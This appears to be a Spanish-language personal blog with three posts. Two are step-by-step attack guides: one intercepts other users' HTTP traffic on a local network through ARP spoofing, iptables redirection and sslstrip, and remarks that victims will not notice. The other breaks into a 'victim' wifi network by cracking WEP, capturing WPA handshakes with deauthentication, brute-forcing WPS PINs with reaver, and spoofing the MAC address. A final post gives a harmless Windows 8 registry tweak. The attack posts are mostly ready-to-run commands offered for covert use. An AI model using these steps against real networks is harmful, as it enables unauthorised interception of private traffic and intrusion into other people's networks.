miércoles, 20 de noviembre de 2013

ESPIANDO EL TRAFICO HTTP

hola
esta prueba la realice con el cd live de kali-linux y lo que necesitamos para espiar el trafico http es los siguiente:

  1. sslstrip (sudo apt-get install sslstrip)
  2. fping (sudo apt-get install fping)
  3. python (lo incluye por defecto)
iniciemos con el tutorial:

1) lo que debemos saber es como esta configurada la red con el siguiente comando
       ifconfig
miramos cual es la dirección ip que nos dio el router al que estamos conectamos por ejemplo: 192.168.0.100
2) ahora buscamos las otras pc's que estan conectadas con el siguiente comando:
      fping -a -g 192.168.0.1 192.168.0.254 > hosts
3) esperamos a que termine para luego leer los hosts con el siguiente comando
     cat hosts
lo que sigue lo debemos de hacer en tres terminales
TERMINAL 1:
1) accedemos como root o super usuario con el siguiente comando
     sudo -sH
2) activamos el ip forwarding con el siguiente comando
     echo 1 > /proc/sys/net/ipv4/ip_forward
3) ejecutamos el comando arpspoof -i <interfaz> -t <victima> <puerta de enlace> con el siguiente comando:
     arpspoof -i wlan0 -t 192.168.0.104 192.168.0.1
donde 192.168.0.1 es la dirección del router que da el internet a la cual estoy conectado y 192.168.0.104 es la ip del computador de la victima
TERMINAL 2:
1) redireccionamos el trafico http del puerto 80 al puerto 8080 con el siguiente comando
     sudo iptables -t nat -A PREROUTING -p tcp --detination-port 80 -j REDIRECT --to-ports 8080
2) ejecutamos sslstrip indicandole -w que lo guarde en un archivo y -l que escuche por el puerto 8080 con el siguiente comando
    sslstrip -w cap -l 8080
TERMINAL 3:
1) finalmente el comando tail para leer la informacion
    tail -f cap
listo ya esta
con esto no se dan cuenta de que los están espiando

lunes, 25 de marzo de 2013

COMO METERSE A UNA RED WIFI

PARA UNA RED WIFI CON SEGURIDAD WEP

Usando un live-cd de linux BackTrack 5, lo primero que debemos hacer es abrir una terminal de comandos y escribir lo siguiente:
airmon-ng
con este comando podemos ver las interfaces de red que tenemos instalados en nuestro equipo, por lo general la que utilizamos es la wlan0.
ya que conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor escribiendo lo siguiente:
airmon-ng start wlan0
ya tenemos nuestra tarjeta en modo monitor y como se dan cuenta "mon0" es el nombre de la interfaz en modo monitor.
ahora escaneamos las redes disponibles con el siguiente comando:
airodump-ng mon0
con este comando nos empieza a mostrar las redes disponibles, para seleccionar la red de la victima tenemos que pulsar ctrl+c.
luego abrimos otra ventana de terminal para capturar la red de la victima y escribimos el siguiente comando:
airodump-ng -w captura -c 11 --bssid 00:11:22:33:44:55 mon0
donde:

-w: especifica el nombre del archivo donde se guarda la captura de datos
-c: especifica el canal de la red
--bssid: especifica la MAC del punto de acceso
-mon0: especifica la interfaz de la tarjeta de red en modo monitoreo

ahora abrimos otra terminal y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0
esto es para asociar su pc con la red victima

ahora pasamos a inyectar paquetes a la red victima para esto escribimos lo siguiente:
aireplay-ng -3 -b 00:11:22:33:44:55 mon0
con esto enviaremos y recibiremos paquetes, ahora vamos a la segunda terminal y en la columna #Data se incrementara rapidamente y solo tenemos que esperar a que llegue a 30.000 datos para poder desencriptar la clave.
cuando llegue a los 30.000 datos abrimos una ultima terminal y escribimos lo siguiente:
aircrack-ng captura-01.cap
donde:
-captura: es el nombre de archivo que le dimos para capturar la red de la victima
y listo, cuando le den enter les va a salor algo como
Key Found (00:09:7F:...)

aqui les dejo el video donde lo encontre



PARA UNA RED WIFI CON SEGURIDAD WPA O WPA2

Usando un live-cd de linux BackTrack 5, lo primero que debemos hacer es abrir una terminal de comandos y escribir lo siguiente:
airmon-ng
con este comando podemos ver las interfaces de red que tenemos instalados en nuestro equipo, por lo general la que utilizamos es la wlan0.
ya que conocemos el nombre de nuestra interfaz procedemos a ponerla en modo monitor escribiendo lo siguiente:
airmon-ng start wlan0
ya tenemos nuestra tarjeta en modo monitor y como se dan cuenta "mon0" es el nombre de la interfaz en modo monitor.
ahora escaneamos las redes disponibles con el siguiente comando:
airodump-ng mon0
con este comando nos empieza a mostrar las redes disponibles, para seleccionar la red de la victima tenemos que pulsar ctrl+c.
luego abrimos otra ventana de terminal para capturar el handshake de la red de la victima y escribimos el siguiente comando:
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura mon0
ahora usaremos aireplay-ng para desautenticar un cliente conectado escribiendo el siguiente comando
aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DEL_CLIENTE mon0
despues usamos aircrack para desencriptar la clave con el siguiente comando
aircrack-ng -w diccionario.lst -b MAC_DEL_AP captura*.cap

en la siguiente pagina encontraras la explicacion del uso de estas herramientas de un modo mas detallado
http://foro.undersecurity.net/read.php?80,928

OTRA MANERA DE INGRESAR A UNA WPA O WPA2

otra manera de sacar la clave en una red WIFI protegida con WPA o WPA2 es utilizando el comando "reaver" de la siguiente manera:

1) Actualizar los paquetes del S.O.
apt-get update
2) Instalamos el paquete "reaver" con el comando:
apt-get install reaver
3) Iniciamos el modo monitor con el comando:
airmon-ng start wlan0
4) Iniciamos la escucha de las redes a las que se les puede hacer el ataque de pines(reaver) asi:
wash -C -i wlan0mon
    se identifican las que digan No en WPS Loked
5) En otra ventana hacemos el ataque con el comando:
reaver -i wlan0mon -b MAC_DEL_AP -c CANAL_DEL_AP -N -S -x 60 -r 3:10 -vv
se puede variar el -r 3:10 (cada 3 intentos esperar 10 segundos)
listo es solo cuestion de tiempo para que nos diga cual es la clave(PSK)

PARA CAMBIAR LA MAC

Para cambiar la MAC usaremos el comando "macchanger" de la siguiente manera:

1) desactivar la antena wifi con:
ifconfig mon0 down
2) cambiar la mac con:
macchanger -m 00:11:22:33:44:55 mon0
3) activamos de nuevo la antena wifi con:
ifconfig mon0 up 

sábado, 5 de enero de 2013

MEJORAR RESOLUCION DE WINDOWS 8

Para forzar a Windows 8 a utilizar resoluciones de 1024X768 debes seguir estos simples pasos

1. Vamos a REGEDIT (tecla Windows+R y tecleamos regedit)
2. Buscaremos la entrada "Display1_DownScalingSupported" presionando ctrl+f
3. Seleccionamos esta entrada y le cambiamos el valor 0 por 1 y damos enter
4. Presionamos la tecla F3 para buscar la siguiente entrada y también le cambiamos el valor 0 por 1
5. Cuando acaben reinician la PC
6. Y listo ya pueden cambiar la resolución a 1024X768